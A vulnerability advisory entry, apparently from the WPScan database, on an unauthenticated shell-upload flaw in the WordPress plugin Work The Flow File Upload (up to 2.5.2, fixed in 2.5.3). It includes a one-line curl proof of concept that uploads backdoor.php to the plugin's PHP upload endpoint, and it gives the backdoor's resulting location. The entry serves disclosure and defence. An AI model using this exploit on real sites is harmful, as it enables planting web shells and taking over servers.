Work The Flow File Upload <= 2.5.2 - Shell Upload

Sign up to our free email alerts service for instant vulnerability notifications!

Description
PoC:

curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php

Backdoor Location:

http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php

Affects

Plugin work-the-flow-file-upload
fixed in version 2.5.3

References

EXPLOITDB 36640
METASPLOIT exploit/unix/webapp/wp_worktheflow_upload
PACKETSTORM 131294
PACKETSTORM 131512
URL http://www.homelab.it/index.php/2015/04/04/wordpress-work-the-flow-file-upload-vulnerability/

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter Claudio Viviani
Submitter Website http://www.homelab.it
Submitter Twitter homelabit
Views 381
Verified Yes
WPVDB ID 7883

Timeline

Publicly Published 2015-04-04 (over 1 year ago)
Added 2015-04-04 (over 1 year ago)
Last Updated 2015-05-15 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.